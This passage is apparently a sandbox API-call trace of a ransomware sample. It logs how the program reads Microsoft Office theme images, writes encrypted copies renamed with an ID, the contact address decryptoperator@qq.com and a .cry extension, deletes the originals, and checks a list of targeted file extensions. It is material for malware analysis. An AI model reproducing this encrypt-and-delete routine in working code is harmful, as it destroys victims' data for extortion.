(normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0044.970] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1453) returned 1 [0044.970] CloseHandle (hObject=0x1c0) returned 1 [0044.970] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif")) returned 0x20 [0044.970] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.970] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0044.970] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.970] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.970] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0044.977] GetLastError () returned 0x0 [0044.977] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x5ad, lpOverlapped=0x0) returned 1 [0044.978] WriteFile (in: hFile=0x1b8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0044.979] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0044.979] WriteFile (in: hFile=0x1b8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.979] SetEndOfFile (hFile=0x1b8) returned 1 [0044.979] CloseHandle (hObject=0x1b8) returned 1 [0044.979] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.979] SetEndOfFile (hFile=0x1c0) returned 1 [0044.980] CloseHandle (hObject=0x1c0) returned 1 [0044.980] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.980] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif")) returned 1 [0044.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0044.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0044.981] lstrlenW (lpString=".doc") returned 4 [0044.981] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.981] lstrlenW (lpString=".docx") returned 5 [0044.981] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.981] lstrlenW (lpString=".pdf") returned 4 [0044.981] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.981] lstrlenW (lpString=".xls") returned 4 [0044.981] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.981] lstrlenW (lpString=".xlsx") returned 5 [0044.981] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.981] lstrlenW (lpString=".ppt") returned 4 [0044.981] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0044.981] lstrlenW (lpString=".zip") returned 4 [0044.981] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.981] lstrlenW (lpString=".rar") returned 4 [0044.981] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.981] lstrlenW (lpString=".bz2") returned 4 [0044.981] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.981] lstrlenW (lpString=".7z") returned 3 [0044.981] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0044.981] lstrlenW (lpString=".dbf") returned 4 [0044.981] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0044.981] lstrlenW (lpString=".1cd") returned 4 [0044.981] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0044.981] lstrlenW (lpString=".jpg") returned 4 [0044.981] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0044.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0044.981] lstrlenW (lpString=".doc") returned 4 [0044.981] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.981] lstrlenW (lpString=".docx") returned 5 [0044.981] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.981] lstrlenW (lpString=".pdf") returned 4 [0044.982] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.982] lstrlenW (lpString=".xls") returned 4 [0044.982] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.982] lstrlenW (lpString=".xlsx") returned 5 [0044.982] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.982] lstrlenW (lpString=".ppt") returned 4 [0044.982] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0044.982] lstrlenW (lpString=".zip") returned 4 [0044.982] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.982] lstrlenW (lpString=".rar") returned 4 [0044.982] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.982] lstrlenW (lpString=".bz2") returned 4 [0044.982] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.982] lstrlenW (lpString=".7z") returned 3 [0044.982] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0044.982] lstrlenW (lpString=".dbf") returned 4 [0044.982] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0044.982] lstrlenW (lpString=".1cd") returned 4 [0044.982] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0044.982] lstrlenW (lpString=".jpg") returned 4 [0044.982] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.982] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0044.982] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.982] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0044.983] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1347) returned 1 [0044.983] CloseHandle (hObject=0x1c0) returned 1 [0044.983] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif")) returned 0x20 [0044.983] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.984] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0044.984] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.984] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.984] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.985] GetLastError () returned 0x0 [0044.985] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x543, lpOverlapped=0x0) returned 1 [0044.991] WriteFile (in: hFile=0x1f8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x550, lpOverlapped=0x0) returned 1 [0044.992] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0044.992] WriteFile (in: hFile=0x1f8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.992] SetEndOfFile (hFile=0x1f8) returned 1 [0044.992] CloseHandle (hObject=0x1f8) returned 1 [0044.992] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.992] SetEndOfFile (hFile=0x1c0) returned 1 [0044.993] CloseHandle (hObject=0x1c0) returned 1 [0044.993] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.993] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif")) returned 1 [0044.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0044.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0044.993] lstrlenW (lpString=".doc") returned 4 [0044.993] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.993] lstrlenW (lpString=".docx") returned 5 [0044.993] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.994] lstrlenW (lpString=".pdf") returned 4 [0044.994] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.994] lstrlenW (lpString=".xls") returned 4 [0044.994] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.994] lstrlenW (lpString=".xlsx") returned 5 [0044.994] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.994] lstrlenW (lpString=".ppt") returned 4 [0044.994] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.994] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0044.994] lstrlenW (lpString=".zip") returned 4 [0044.994] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.994] lstrlenW (lpString=".rar") returned 4 [0044.994] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.994] lstrlenW (lpString=".bz2") returned 4 [0044.994] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.994] lstrlenW (lpString=".7z") returned 3 [0044.994] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.994] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0044.994] lstrlenW (lpString=".dbf") returned 4 [0044.994] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.994] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0044.994] lstrlenW (lpString=".1cd") returned 4 [0044.994] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.994] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0044.994] lstrlenW (lpString=".jpg") returned 4 [0044.994] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.994] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0044.994] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0044.994] lstrlenW (lpString=".doc") returned 4 [0044.994] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.994] lstrlenW (lpString=".docx") returned 5 [0044.994] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.994] lstrlenW (lpString=".pdf") returned 4 [0044.994] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.994] lstrlenW (lpString=".xls") returned 4 [0044.994] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.994] lstrlenW (lpString=".xlsx") returned 5 [0044.994] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.995] lstrlenW (lpString=".ppt") returned 4 [0044.995] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0044.995] lstrlenW (lpString=".zip") returned 4 [0044.995] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.995] lstrlenW (lpString=".rar") returned 4 [0044.995] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.995] lstrlenW (lpString=".bz2") returned 4 [0044.995] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.995] lstrlenW (lpString=".7z") returned 3 [0044.995] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0044.995] lstrlenW (lpString=".dbf") returned 4 [0044.995] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0044.995] lstrlenW (lpString=".1cd") returned 4 [0044.995] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0044.995] lstrlenW (lpString=".jpg") returned 4 [0044.995] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.995] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0044.995] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.995] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0044.995] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=32403) returned 1 [0044.995] CloseHandle (hObject=0x1c0) returned 1 [0044.996] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png")) returned 0x20 [0044.996] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.996] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0044.996] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.996] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.996] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.996] GetLastError () returned 0x0 [0044.996] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x7e93, lpOverlapped=0x0) returned 1 [0044.999] WriteFile (in: hFile=0x1f8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x7ea0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x7ea0, lpOverlapped=0x0) returned 1 [0045.000] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0045.000] WriteFile (in: hFile=0x1f8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.000] SetEndOfFile (hFile=0x1f8) returned 1 [0045.000] CloseHandle (hObject=0x1f8) returned 1 [0045.000] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.000] SetEndOfFile (hFile=0x1c0) returned 1 [0045.001] CloseHandle (hObject=0x1c0) returned 1 [0045.001] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.001] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png")) returned 1 [0045.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.001] lstrlenW (lpString=".doc") returned 4 [0045.001] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.001] lstrlenW (lpString=".docx") returned 5 [0045.001] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.001] lstrlenW (lpString=".pdf") returned 4 [0045.001] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.001] lstrlenW (lpString=".xls") returned 4 [0045.002] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.002] lstrlenW (lpString=".xlsx") returned 5 [0045.002] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.002] lstrlenW (lpString=".ppt") returned 4 [0045.002] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.002] lstrlenW (lpString=".zip") returned 4 [0045.002] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.002] lstrlenW (lpString=".rar") returned 4 [0045.002] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.002] lstrlenW (lpString=".bz2") returned 4 [0045.002] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.002] lstrlenW (lpString=".7z") returned 3 [0045.002] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.002] lstrlenW (lpString=".dbf") returned 4 [0045.002] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.002] lstrlenW (lpString=".1cd") returned 4 [0045.002] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.002] lstrlenW (lpString=".jpg") returned 4 [0045.002] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.002] lstrlenW (lpString=".doc") returned 4 [0045.002] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.002] lstrlenW (lpString=".docx") returned 5 [0045.002] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.002] lstrlenW (lpString=".pdf") returned 4 [0045.002] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.002] lstrlenW (lpString=".xls") returned 4 [0045.002] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.002] lstrlenW (lpString=".xlsx") returned 5 [0045.002] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.002] lstrlenW (lpString=".ppt") returned 4 [0045.002] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.003] lstrlenW (lpString=".zip") returned 4 [0045.003] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.003] lstrlenW (lpString=".rar") returned 4 [0045.003] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.003] lstrlenW (lpString=".bz2") returned 4 [0045.003] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.003] lstrlenW (lpString=".7z") returned 3 [0045.003] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.003] lstrlenW (lpString=".dbf") returned 4 [0045.003] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.003] lstrlenW (lpString=".1cd") returned 4 [0045.003] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.003] lstrlenW (lpString=".jpg") returned 4 [0045.003] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.003] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 